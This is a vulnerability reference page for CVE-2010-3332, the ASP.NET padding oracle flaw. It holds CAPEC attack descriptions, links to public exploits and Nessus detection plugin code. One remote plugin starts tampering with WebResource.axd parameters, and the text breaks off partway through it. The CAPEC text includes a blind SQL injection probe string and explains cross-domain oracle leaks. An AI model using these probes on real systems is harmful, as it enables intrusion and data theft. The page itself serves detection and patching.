Vulnerabilities > CVE-2010-3332 - Information Exposure Through AN Error Message vulnerability in Microsoft .Net Framework

047910
CVSS 6.4 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
microsoft
CWE-209
nessus
exploit available

Summary

Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability."

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Fuzzing for garnering J2EE/.NET-based stack traces, for application mapping
    An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes any stack traces produced by error messages. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to cause the targeted application to return an error including a stack trace, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. The stack trace enumerates the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.
  • Fuzzing and observing application log data/errors for application mapping
    An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information.
  • Padding Oracle Crypto Attack
    An attacker is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an attacker is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an attacker is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key. Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the attacker. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the attacker whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the attacker to break the cryptosystem. That bit of information can come in a form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross domain where an attacker is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating. To do so an attacker sends a request containing ciphertext to the target system. Due to the browser's same origin policy, the attacker is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). For instance, this can be done using "img" tag plus the onerror()/onload() events. The attacker's JavaScript can make web browsers to load an image on the target site, and know if the image is loaded or not. This is 1-bit information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not.
  • Probe Application Error Reporting
    An Attacker, aware of an application's location (and possibly authorized to use the application) can probe the application's structure and evaluate its robustness by probing its error conditions (not unlike one would during a 'fuzz' test, but more purposefully here) in order to support attacks such as blind SQL injection, or for the more general task of mapping the application to mount another subsequent attack.
  • Blind SQL Injection
    Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the attacker constructs input strings that probe the target through simple Boolean SQL expressions. The attacker can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the attacker determines how and where the target is vulnerable to SQL Injection. For example, an attacker may try entering something like "username' AND 1=1; --" in an input field. If the result is the same as when the attacker entered "username" in the field, then the attacker knows that the application is vulnerable to SQL Injection. The attacker can then ask yes/no questions from the database server to extract information from it. For example, the attacker can extract table names from a database using the following types of queries: If the above query executes properly, then the attacker knows that the first character in a table name in the database is a letter between m and z. If it doesn't, then the attacker knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the attacker can determine all table names in the database. Subsequently, the attacker may execute an actual attack and send something like:

Exploit-Db

  • descriptionMS10-070 ASP.NET Padding Oracle File Download. CVE-2010-3332. Remote exploit for asp platform
    idEDB-ID:15265
    last seen2016-02-01
    modified2010-10-17
    published2010-10-17
    reporterAgustin Azubel
    sourcehttps://www.exploit-db.com/download/15265/
    titleASP.NET Padding Oracle File Download MS10-070
  • descriptionASP.NET Padding Oracle Vulnerability (MS10-070). CVE-2010-3332. Remote exploit for asp platform
    idEDB-ID:15213
    last seen2016-02-01
    modified2010-10-06
    published2010-10-06
    reporterGiorgio Fedon
    sourcehttps://www.exploit-db.com/download/15213/
    titleASP.NET Padding Oracle Vulnerability MS10-070
  • descriptionMS10-070 ASP.NET Auto-Decryptor File Download Exploit. CVE-2010-3332. Remote exploit for windows platform
    idEDB-ID:15292
    last seen2016-02-01
    modified2010-10-20
    published2010-10-20
    reporterAgustin Azubel
    sourcehttps://www.exploit-db.com/download/15292/
    titleASP.NET Auto-Decryptor File Download Exploit MS10-070

Msbulletin

bulletin_idMS10-070
bulletin_url
date2010-09-28T00:00:00
impactInformation Disclosure
knowledgebase_id2418042
knowledgebase_url
severityImportant
titleVulnerability in ASP.NET Could Allow Information Disclosure

Nessus

  • NASL familyWindows : Microsoft Bulletins
    NASL idSMB_NT_MS10-070.NASL
    descriptionThere is an information disclosure vulnerability in ASP.NET, part of the .NET framework. Information can be leaked due to improper error handling during encryption padding. A remote attacker could exploit this to decrypt and modify an ASP.NET application
    last seen2020-06-01
    modified2020-06-02
    plugin id49695
    published2010-09-28
    reporterThis script is Copyright (C) 2010-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/49695
    titleMS10-070: Vulnerability in ASP.NET Could Allow Information Disclosure (2418042)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    include("compat.inc");
    
    
    if (description)
    {
      script_id(49695);
      script_version("1.23");
      script_cvs_date("Date: 2018/11/15 20:50:30");
    
      script_cve_id("CVE-2010-3332");
      script_bugtraq_id(43316);
      script_xref(name:"MSFT", value:"MS10-070");
      script_xref(name:"MSKB", value:"2416447");
      script_xref(name:"MSKB", value:"2416451");
      script_xref(name:"MSKB", value:"2416468");
      script_xref(name:"MSKB", value:"2416469");
      script_xref(name:"MSKB", value:"2416470");
      script_xref(name:"MSKB", value:"2416471");
      script_xref(name:"MSKB", value:"2416472");
      script_xref(name:"MSKB", value:"2416473");
      script_xref(name:"MSKB", value:"2416474");
      script_xref(name:"MSKB", value:"2418240");
      script_xref(name:"MSKB", value:"2418241");
    
      script_name(english:"MS10-070: Vulnerability in ASP.NET Could Allow Information Disclosure (2418042)");
      script_summary(english:"Checks version of System.web.dll / System.web.extensions.dll");
    
      script_set_attribute(
        attribute:"synopsis",
        value:
    "The version of the .NET framework installed on the remote host has an
    information disclosure vulnerability."
      );
      script_set_attribute(
        attribute:"description",
        value:
    "There is an information disclosure vulnerability in ASP.NET, part of
    the .NET framework.  Information can be leaked due to improper error
    handling during encryption padding.
    
    A remote attacker could exploit this to decrypt and modify an ASP.NET
    application's server-encrypted data.  In .NET Framework 3.5 SP1 and
    above, an attacker could exploit this to download any file within the
    ASP.NET application, including web.config."
      );
      script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-070");
      script_set_attribute(
        attribute:"solution",
        value:
    "Microsoft has released a set of patches for the .NET Framework on
    Windows XP, 2003, Vista, 2008, 7, and 2008 R2."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2010/09/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2010/09/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2010/09/28");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
    
      script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:.net_framework");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows : Microsoft Bulletins");
    
      script_copyright(english:"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.");
    
      script_dependencies("smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl");
      script_require_keys("SMB/MS_Bulletin_Checks/Possible");
      script_require_ports(139, 445, 'Host/patch_management_checks');
    
      exit(0);
    }
    
    include("audit.inc");
    include("smb_func.inc");
    include("smb_hotfixes.inc");
    include("smb_hotfixes_fcheck.inc");
    include("misc_func.inc");
    
    get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");
    
    bulletin = 'MS10-070';
    kbs = make_list("2416447", "2416451", "2416468", "2416469", "2416470", "2416471", "2416472", "2416473", "2416474", "2418240", "2418241");
    if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);
    
    get_kb_item_or_exit("SMB/Registry/Enumerated");
    ver = get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);
    
    if (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'1,2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);
    
    if (ver == '6.0' && hotfix_check_server_core() == 1)
      audit(AUDIT_WIN_SERVER_CORE);
    
    rootfile = hotfix_get_systemroot();
    if (!rootfile) exit(1, "Failed to get the system root.");
    
    share = hotfix_path2share(path:rootfile);
    if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);
    
    ass_dir = hotfix_get_programfilesdir() + "\Reference Assemblies\Microsoft\Framework";
    vuln = 0;
    
    # 1.1 SP1 on XP, 2k3 x64, Vista, 2k8 (KB2416447)
    mising = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"1.1.4322.2470", min_version:"1.1.4322.0", dir:"\Microsoft.NET\Framework\v1.1.4322");
    missing += hotfix_is_vulnerable(os:"5.2", arch:"x64", file:"System.Web.dll", version:"1.1.4322.2470", min_version:"1.1.4322.0", dir:"\Microsoft.NET\Framework\v1.1.4322");
    missing += hotfix_is_vulnerable(os:"6.0", file:"System.Web.dll", version:"1.1.4322.2470", min_version:"1.1.4322.0", dir:"\Microsoft.NET\Framework\v1.1.4322");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416447');
    vuln += missing;
    
    # 1.1 SP1 on 2k3 x86 (KB2416451)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.2", arch:"x86", file:"System.Web.dll", version:"1.1.4322.2470", min_version:"1.1.4322.0", dir:"\Microsoft.NET\Framework\v1.1.4322");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416451');
    vuln += missing;
    
    # 3.5 on XP, 2k3 (KB2416468)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"2.0.50727.1887", min_version:"2.0.50727.1433", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.dll", version:"2.0.50727.1887", min_version:"2.0.50727.1433", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416468');
    vuln += missing;
    
    # 3.5 on XP, 2k3, Vista, 2k8 (KB2418240)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.Extensions.dll", version:"3.5.21022.239", min_version:"3.5.21022.0", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.Extensions.dll", version:"3.5.21022.239", min_version:"3.5.21022.0", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"6.0", sp:2, file:"System.Web.Extensions.dll", version:"3.5.21022.239", min_version:"3.5.21022.0", path:ass_dir + "\v3.5");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2418240');
    vuln += missing;
    
    # 3.5 SP1 and 2.0 SP2 on XP, 2k3 (KB2418241)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"2.0.50727.3618", min_version:"2.0.50727.3000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"2.0.50727.5053", min_version:"2.0.50727.5000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.dll", version:"2.0.50727.3618", min_version:"2.0.50727.3000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.dll", version:"2.0.50727.5053", min_version:"2.0.50727.5000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2418241');
    vuln += missing;
    
    # 3.5 SP1 on XP, 2k3, Vista, 2k8 (KB2416473)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.Extensions.dll", version:"3.5.30729.3644", min_version:"3.5.30729.0", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.Extensions.dll", version:"3.5.30729.5053", min_version:"3.5.30729.5000", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.Extensions.dll", version:"3.5.30729.3644", min_version:"3.5.30729.0", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.Extensions.dll", version:"3.5.30729.5053", min_version:"3.5.30729.5000", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"6.0", file:"System.Web.Extensions.dll", version:"3.5.30729.3644", min_version:"3.5.30729.0", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"6.0", file:"System.Web.Extensions.dll", version:"3.5.30729.5053", min_version:"3.5.30729.5000", path:ass_dir + "\v3.5");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416473');
    vuln += missing;
    
    # 2.0 SP1 and 3.5 on Vista SP1 and 2008 (KB2416469)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"6.0", sp:1, file:"System.web.dll", version:"2.0.50727.1887", min_version:"2.0.50727.1000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416469');
    vuln += missing;
    
    # 2.0 SP2 and 3.5 SP1 on Vista SP1 and 2008 (KB2416474)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"6.0", sp:1, file:"System.web.dll", version:"2.0.50727.3618", min_version:"2.0.50727.3000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"6.0", sp:1, file:"System.web.dll", version:"2.0.50727.5053", min_version:"2.0.50727.4400", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416474');
    vuln += missing;
    
    # 2.0 SP2 and 3.5 SP1 on Vista SP2, 2k8 SP2 (KB2416470)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"6.0", sp:2, file:"System.web.dll", version:"2.0.50727.4209", min_version:"2.0.50727.3000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"6.0", sp:2, file:"System.web.dll", version:"2.0.50727.5053", min_version:"2.0.50727.4400", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416470');
    vuln += missing;
    
    # 3.5.1 on Windows 7 and 2008 R2 (KB2416471)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"6.1", sp:0, file:"System.web.dll", version:"2.0.50727.5053", min_version:"2.0.50727.5000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"6.1", sp:0, file:"System.web.dll", version:"2.0.50727.4955", min_version:"2.0.50727.4000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416471');
    vuln += missing;
    
    # 4.0 on XP, 2k3, Vista, 2k8, 7, 2008 R2 (KB2416472)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"4.0.30319.206", min_version:"4.0.30319.0", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"4.0.30319.363", min_version:"4.0.30319.300", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.dll", version:"4.0.30319.206", min_version:"4.0.30319.0", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.dll", version:"4.0.30319.363", min_version:"4.0.30319.300", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"6.0", file:"System.Web.dll", version:"4.0.30319.206", min_version:"4.0.30319.0", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"6.0", file:"System.Web.dll", version:"4.0.30319.363", min_version:"4.0.30319.300", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"6.1", file:"System.Web.dll", version:"4.0.30319.206", min_version:"4.0.30319.0", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"6.1", file:"System.Web.dll", version:"4.0.30319.363", min_version:"4.0.30319.300", dir:"\Microsoft.NET\Framework\v4.0.30319");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416472');
    vuln += missing;
    
    if (vuln > 0)
    {
      set_kb_item(name:"SMB/Missing/MS10-070", value:TRUE);
      hotfix_security_warning();
    
      hotfix_check_fversion_end();
      exit(0);
    }
    else
    {
      hotfix_check_fversion_end();
      audit(AUDIT_HOST_NOT, 'affected');
    }
    
  • NASL familySuSE Local Security Checks
    NASL idSUSE_BYTEFX-DATA-MYSQL-8001.NASL
    descriptionThe FORMS authentication methods of mono ASP.net implementation were vulnerable to a padding oracle attack as described in CVE-2010-3332, as they did encryption after checksum. This update changes the method to checksum after encryption to avoid this attack.
    last seen2020-06-05
    modified2012-03-21
    plugin id58408
    published2012-03-21
    reporterThis script is Copyright (C) 2012-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/58408
    titleSuSE 10 Security Update : Mono (ZYPP Patch Number 8001)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The text description of this plugin is (C) Novell, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(58408);
      script_version ("1.7");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
    
      script_cve_id("CVE-2010-3332");
    
      script_name(english:"SuSE 10 Security Update : Mono (ZYPP Patch Number 8001)");
      script_summary(english:"Checks rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote SuSE 10 host is missing a security-related patch."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The FORMS authentication methods of mono ASP.net implementation were
    vulnerable to a padding oracle attack as described in CVE-2010-3332,
    as they did encryption after checksum.
    
    This update changes the method to checksum after encryption to avoid
    this attack."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://support.novell.com/security/cve/CVE-2010-3332.html"
      );
      script_set_attribute(attribute:"solution", value:"Apply ZYPP patch number 8001.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2012/02/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2012/03/21");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2012-2020 Tenable Network Security, Inc.");
      script_family(english:"SuSE Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
    
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled.");
    if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE.");
    if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages.");
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) exit(1, "Failed to determine the architecture type.");
    if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 10 on the '"+cpu+"' architecture have not been implemented.");
    
    
    flag = 0;
    if (rpm_check(release:"SLED10", sp:4, reference:"bytefx-data-mysql-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"ibm-data-db2-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-core-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-firebird-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-oracle-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-postgresql-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-sqlite-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-sybase-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-devel-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-extras-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-locale-extras-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-nunit-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-web-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-winforms-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, cpu:"x86_64", reference:"mono-core-32bit-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-core-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-firebird-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-oracle-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-postgresql-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-sqlite-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-sybase-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-locale-extras-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-nunit-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-web-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-winforms-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, cpu:"x86_64", reference:"mono-core-32bit-1.2.2-12.32.1")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    else exit(0, "The host is not affected.");
    
  • NASL familyWindows
    NASL idPADDING_ORACLE_MS10-070.NASL
    descriptionThere is an information disclosure vulnerability in ASP.NET, part of the .NET framework. Information can be leaked due to improper error handling during encryption padding. A remote attacker could exploit this to decrypt and modify an ASP.NET application
    last seen2020-06-01
    modified2020-06-02
    plugin id49806
    published2010-10-08
    reporterThis script is Copyright (C) 2010-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/49806
    titleMS10-070: Vulnerability in ASP.NET Could Allow Information Disclosure (2418042) (uncredentialed check)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(49806);
      script_version("1.20");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
    
      script_cve_id("CVE-2010-3332");
      script_bugtraq_id(43316);
      script_xref(name:"MSFT", value:"MS10-070");
      script_xref(name:"MSKB", value:"2416447");
      script_xref(name:"MSKB", value:"2416451");
      script_xref(name:"MSKB", value:"2416468");
      script_xref(name:"MSKB", value:"2416469");
      script_xref(name:"MSKB", value:"2416470");
      script_xref(name:"MSKB", value:"2416471");
      script_xref(name:"MSKB", value:"2416472");
      script_xref(name:"MSKB", value:"2416473");
      script_xref(name:"MSKB", value:"2416474");
      script_xref(name:"MSKB", value:"2418240");
      script_xref(name:"MSKB", value:"2418241");
    
      script_name(english:"MS10-070: Vulnerability in ASP.NET Could Allow Information Disclosure (2418042) (uncredentialed check)");
      script_summary(english:"Test vulnerability of ASP.NET to MS10-070");
    
      script_set_attribute(
        attribute:"synopsis",
        value:
    "The version of the .NET framework installed on the remote host has an
    information disclosure vulnerability."
      );
      script_set_attribute(
        attribute:"description",
        value:
    "There is an information disclosure vulnerability in ASP.NET, part of
    the .NET framework.  Information can be leaked due to improper error
    handling during encryption padding.
    
    A remote attacker could exploit this to decrypt and modify an ASP.NET
    application's server-encrypted data.  In .NET Framework 3.5 SP1 and
    above, an attacker could exploit this to download any file within the
    ASP.NET application, including web.config."
      );
      script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-070");
      script_set_attribute(
        attribute:"solution",
        value:
    "Microsoft has released a set of patches for Windows XP, 2003, Vista,
    2008, 7, and 2008 R2."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2010/09/17");
      script_set_attribute(attribute:"patch_publication_date", value:"2010/09/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/08");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:.net_framework");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"Windows");
      script_copyright(english:"This script is Copyright (C) 2010-2020 Tenable Network Security, Inc.");
    
      script_dependencie("webmirror.nasl", "http_version.nasl");
      script_require_ports("Services/www", 80);
    
      exit(0);
    }
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    function base64url_decode(str)
    {
      local_var cstr,padlen;
    
      # strip last char
      cstr = substr(str, 0, strlen(str) - 2);
    
      # num of '=' to pad
      padlen = str[strlen(str) -1];
    
      cstr = str_replace(string:cstr, find:"-",replace:"+");
      cstr = str_replace(string:cstr, find:"_",replace:"/");
      cstr += crap(data:"=",length:padlen);
    
      return base64_decode(str:cstr);
    }
    
    function base64url_encode(str)
    {
      local_var cstr, idx, padchars;
    
      cstr = base64(str:str);
    
      # look for '='
      idx = stridx(cstr,"=");
    
      if(idx != -1)
      {
        padchars  = substr(cstr, idx, strlen(cstr) -1);
    
        cstr      = substr(cstr, 0, idx -1);
        cstr      += strlen(padchars);
      }
      else # no padding
        cstr += "0";
    
      cstr = str_replace(string:cstr, find:"+",replace:"-");
      cstr = str_replace(string:cstr, find:"/",replace:"_");
    
      return cstr;
    }
    
    #
    # parse link like url?arg1=value1&arg2=value2...
    #
    # ret['url']    = url part
    # ret['args']   = array of 'arg' associative arrays
    #
    function parse_link(link)
    {
      local_var ret, arg_pair_l, arg_pair, array, arg, match;
    
      match = eregmatch(string:link,pattern:"^(.+)\?(.+)$");
    
      # link with no arguments
      if(! match)
      {
        ret['url'] = link;
        return ret;
      }
    
      ret['url'] = match[1];
      arg_pair_l = split(match[2],sep:"&", keep:FALSE);
    
      foreach arg_pair(arg_pair_l)
      {
        array = split(arg_pair,sep:"=",keep:FALSE);
        arg[array[0]]  = array[1];
      }
    
      ret['args'] = arg;
    
      return ret;
    }
    
    # Perform the axd check with the given d and t arguments
    function check_axd_go(port, path, d, t)
    {
      local_var req, res, axd, fixed, original, final_url, links, array, item;
    
      # Make sure we have all the arguments we need
      if(isnull(path) || isnull(d) || isnull(t))
        return NULL;
    
      #decode
      original = base64url_decode(str:d);
    
      #change the last byte
      fixed = original;
